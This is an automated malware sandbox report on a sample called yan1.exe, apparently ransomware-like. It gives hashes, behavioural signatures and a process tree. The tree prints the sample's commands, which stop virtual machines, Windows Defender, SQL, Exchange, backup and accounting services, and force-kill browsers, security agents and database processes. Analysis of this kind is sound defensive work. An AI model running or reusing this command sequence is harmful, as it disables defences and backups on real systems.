Analysis
-
max time kernel
108s -
max time network
44s -
platform
windows7_x64 -
resource
win7-20220812-en -
resource tags
arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system -
submitted
28-10-2022 06:14
Behavioral task
behavioral1
Sample
yan1.exe
Resource
win7-20220812-en
windows7-x64
5 signatures
150 seconds
General
-
Target
yan1.exe
-
Size
398KB
-
MD5
afaf2d4ebb6dc47e79a955df5ad1fc8a
-
SHA1
c418ce055d97928f94ba06b5de8124a601d8f632
-
SHA256
d11793433065633b84567de403c1989640a07c9a399dd2753aaf118891ce791c
-
SHA512
321424ac21ebdb7f759a84236cb95c533b3000b3143099e1697f4a1f534c11782dafa68e5fa9e662b973b9669c1177b69c2fd0b83455625e57aa123385f581e6
-
SSDEEP
12288:EfaLQyGK6kAa2XgsA1RUa+jE6S3qRTjO0:EwIHnXp/O0
Malware Config
Signatures
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
Processes:
powershell.exepid process 1496 powershell.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
Processes:
yan1.exepowershell.exedescription pid process Token: SeTakeOwnershipPrivilege 1132 yan1.exe Token: SeTakeOwnershipPrivilege 1132 yan1.exe Token: SeTakeOwnershipPrivilege 1132 yan1.exe Token: SeDebugPrivilege 1496 powershell.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
yan1.execmd.exedescription pid process target process PID 1132 wrote to memory of 1492 1132 yan1.exe cmd.exe PID 1132 wrote to memory of 1492 1132 yan1.exe cmd.exe PID 1132 wrote to memory of 1492 1132 yan1.exe cmd.exe PID 1132 wrote to memory of 1492 1132 yan1.exe cmd.exe PID 1132 wrote to memory of 1452 1132 yan1.exe cmd.exe PID 1132 wrote to memory of 1452 1132 yan1.exe cmd.exe PID 1132 wrote to memory of 1452 1132 yan1.exe cmd.exe PID 1132 wrote to memory of 1452 1132 yan1.exe cmd.exe PID 1132 wrote to memory of 856 1132 yan1.exe cmd.exe PID 1132 wrote to memory of 856 1132 yan1.exe cmd.exe PID 1132 wrote to memory of 856 1132 yan1.exe cmd.exe PID 1132 wrote to memory of 856 1132 yan1.exe cmd.exe PID 1132 wrote to memory of 876 1132 yan1.exe cmd.exe PID 1132 wrote to memory of 876 1132 yan1.exe cmd.exe PID 1132 wrote to memory of 876 1132 yan1.exe cmd.exe PID 1132 wrote to memory of 876 1132 yan1.exe cmd.exe PID 1132 wrote to memory of 1648 1132 yan1.exe cmd.exe PID 1132 wrote to memory of 1648 1132 yan1.exe cmd.exe PID 1132 wrote to memory of 1648 1132 yan1.exe cmd.exe PID 1132 wrote to memory of 1648 1132 yan1.exe cmd.exe PID 1132 wrote to memory of 1076 1132 yan1.exe cmd.exe PID 1132 wrote to memory of 1076 1132 yan1.exe cmd.exe PID 1132 wrote to memory of 1076 1132 yan1.exe cmd.exe PID 1132 wrote to memory of 1076 1132 yan1.exe cmd.exe PID 1132 wrote to memory of 1488 1132 yan1.exe cmd.exe PID 1132 wrote to memory of 1488 1132 yan1.exe cmd.exe PID 1132 wrote to memory of 1488 1132 yan1.exe cmd.exe PID 1132 wrote to memory of 1488 1132 yan1.exe cmd.exe PID 1132 wrote to memory of 240 1132 yan1.exe cmd.exe PID 1132 wrote to memory of 240 1132 yan1.exe cmd.exe PID 1132 wrote to memory of 240 1132 yan1.exe cmd.exe PID 1132 wrote to memory of 240 1132 yan1.exe cmd.exe PID 1492 wrote to memory of 1496 1492 cmd.exe powershell.exe PID 1492 wrote to memory of 1496 1492 cmd.exe powershell.exe PID 1492 wrote to memory of 1496 1492 cmd.exe powershell.exe PID 1492 wrote to memory of 1496 1492 cmd.exe powershell.exe PID 1132 wrote to memory of 300 1132 yan1.exe cmd.exe PID 1132 wrote to memory of 300 1132 yan1.exe cmd.exe PID 1132 wrote to memory of 300 1132 yan1.exe cmd.exe PID 1132 wrote to memory of 300 1132 yan1.exe cmd.exe PID 1132 wrote to memory of 1692 1132 yan1.exe cmd.exe PID 1132 wrote to memory of 1692 1132 yan1.exe cmd.exe PID 1132 wrote to memory of 1692 1132 yan1.exe cmd.exe PID 1132 wrote to memory of 1692 1132 yan1.exe cmd.exe PID 1132 wrote to memory of 1356 1132 yan1.exe cmd.exe PID 1132 wrote to memory of 1356 1132 yan1.exe cmd.exe PID 1132 wrote to memory of 1356 1132 yan1.exe cmd.exe PID 1132 wrote to memory of 1356 1132 yan1.exe cmd.exe PID 1132 wrote to memory of 1824 1132 yan1.exe cmd.exe PID 1132 wrote to memory of 1824 1132 yan1.exe cmd.exe PID 1132 wrote to memory of 1824 1132 yan1.exe cmd.exe PID 1132 wrote to memory of 1824 1132 yan1.exe cmd.exe PID 1132 wrote to memory of 860 1132 yan1.exe cmd.exe PID 1132 wrote to memory of 860 1132 yan1.exe cmd.exe PID 1132 wrote to memory of 860 1132 yan1.exe cmd.exe PID 1132 wrote to memory of 860 1132 yan1.exe cmd.exe PID 1132 wrote to memory of 1744 1132 yan1.exe cmd.exe PID 1132 wrote to memory of 1744 1132 yan1.exe cmd.exe PID 1132 wrote to memory of 1744 1132 yan1.exe cmd.exe PID 1132 wrote to memory of 1744 1132 yan1.exe cmd.exe PID 1132 wrote to memory of 484 1132 yan1.exe cmd.exe PID 1132 wrote to memory of 484 1132 yan1.exe cmd.exe PID 1132 wrote to memory of 484 1132 yan1.exe cmd.exe PID 1132 wrote to memory of 484 1132 yan1.exe cmd.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\yan1.exeC:\Users\Admin\AppData\Local\Temp\yan1.exe -pass D86BDXL9N3H1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1132 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c powershell -command "Get-VM | Stop-VM -Force"2⤵
- Suspicious use of WriteProcessMemory
PID:1492 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "Get-VM | Stop-VM -Force"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1496
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" net stop MSSQLServerADHelper1002⤵PID:1452
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" net stop MSSQL$ISARS2⤵PID:856
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" net stop MSSQL$MSFW2⤵PID:876
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" net stop SQLAgent$ISARS2⤵PID:1648
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" net stop SQLAgent$MSFW2⤵PID:1076
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" net stop SQLBrowser2⤵PID:1488
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" net stop ReportServer$ISARS2⤵PID:240
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" net stop SQLWriter2⤵PID:300
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" net stop WinDefend2⤵PID:1692
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" net stop mr2kserv2⤵PID:1356
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" net stop MSExchangeADTopology2⤵PID:1824
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" net stop MSExchangeFBA2⤵PID:860
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" net stop MSExchangeIS2⤵PID:1744
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" net stop MSExchangeSA2⤵PID:484
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" net stop ShadowProtectSvc2⤵PID:800
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" net stop SPAdminV42⤵PID:820
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" net stop SPTimerV42⤵PID:1332
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" net stop SPTraceV42⤵PID:304
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" net stop SPUserCodeV42⤵PID:1520
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" net stop SPWriterV42⤵PID:1272
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" net stop SPSearch42⤵PID:792
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" net stop MSSQLServerADHelper1002⤵PID:1064
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" net stop IISADMIN2⤵PID:1244
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" net stop firebirdguardiandefaultinstance2⤵PID:572
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" net stop ibmiasrw2⤵PID:996
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" net stop QBCFMonitorService2⤵PID:1576
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" net stop QBVSS2⤵PID:596
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" net stop QBPOSDBServiceV122⤵PID:680
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" net stop "IBM Domino Server (CProgramFilesIBMDominodata)"2⤵PID:948
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" net stop "IBM Domino Diagnostics (CProgramFilesIBMDomino)"2⤵PID:1252
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" net stop IISADMIN2⤵PID:2056
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" net stop "Simply Accounting Database Connection Manager"2⤵PID:2076
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" net stop QuickBooksDB12⤵PID:2096
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" net stop QuickBooksDB22⤵PID:2116
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" net stop QuickBooksDB32⤵PID:2168
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" net stop QuickBooksDB42⤵PID:2188
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" net stop QuickBooksDB52⤵PID:2208
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" net stop QuickBooksDB62⤵PID:2224
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" net stop QuickBooksDB72⤵PID:2248
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" net stop QuickBooksDB82⤵PID:2280
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" net stop QuickBooksDB92⤵PID:2344
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" net stop QuickBooksDB102⤵PID:2368
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" net stop QuickBooksDB112⤵PID:2408
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" net stop QuickBooksDB122⤵PID:2432
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" net stop QuickBooksDB132⤵PID:2452
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" net stop QuickBooksDB142⤵PID:2472
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" net stop QuickBooksDB152⤵PID:2492
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" net stop QuickBooksDB162⤵PID:2508
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" net stop QuickBooksDB172⤵PID:2568
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" net stop QuickBooksDB182⤵PID:2592
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" net stop QuickBooksDB192⤵PID:2620
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" net stop QuickBooksDB202⤵PID:2640
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" net stop QuickBooksDB212⤵PID:2680
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" net stop QuickBooksDB222⤵PID:2728
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" net stop QuickBooksDB232⤵PID:2748
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" net stop QuickBooksDB242⤵PID:2768
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" net stop QuickBooksDB252⤵PID:2788
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" taskkill /f /im mysql*2⤵PID:2800
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" taskkill /f /im dsa*2⤵PID:2856
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" taskkill /f /im veeam*2⤵PID:2876
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" taskkill /f /im chrome*2⤵PID:2896
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" taskkill /f /im iexplore*2⤵PID:2916
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" taskkill /f /im firefox*2⤵PID:2936
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" taskkill /f /im outlook*2⤵PID:2952
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" taskkill /f /im excel*2⤵PID:2968
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" taskkill /f /im outlook*2⤵PID:2984
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" taskkill /f /im taskmgr*2⤵PID:2992
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" taskkill /f /im tasklist*2⤵PID:3012
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" taskkill /f /im Ntrtscan*2⤵PID:3024
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" taskkill /f /im ds_monitor*2⤵PID:3040
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" taskkill /f /im Notifier*2⤵PID:3056
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" taskkill /f /im putty*2⤵PID:3064
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" taskkill /f /im ssh*2⤵PID:2084
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" taskkill /f /im TmListen*2⤵PID:2124
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" taskkill /f /im iVPAgent*2⤵PID:2220
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" taskkill /f /im CNTAoSMgr*2⤵PID:2204
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" taskkill /f /im IBM*2⤵PID:2336
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" taskkill /f /im bes10*2⤵PID:2440
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" taskkill /f /im black*2⤵PID:2404
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" taskkill /f /im robo*2⤵PID:2428
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" taskkill /f /im copy*2⤵PID:2468
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" taskkill /f /im sql2⤵PID:2524
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" taskkill /f /im store.exe2⤵PID:2564
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" taskkill /f /im sql*2⤵PID:2964
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" taskkill /f /im vee*2⤵PID:2864
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" taskkill /f /im wrsa*2⤵PID:2932
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" taskkill /f /im wrsa.exe2⤵PID:3080
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" taskkill /f /im postg*2⤵PID:3088
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" taskkill /f /im sage*2⤵PID:3096
-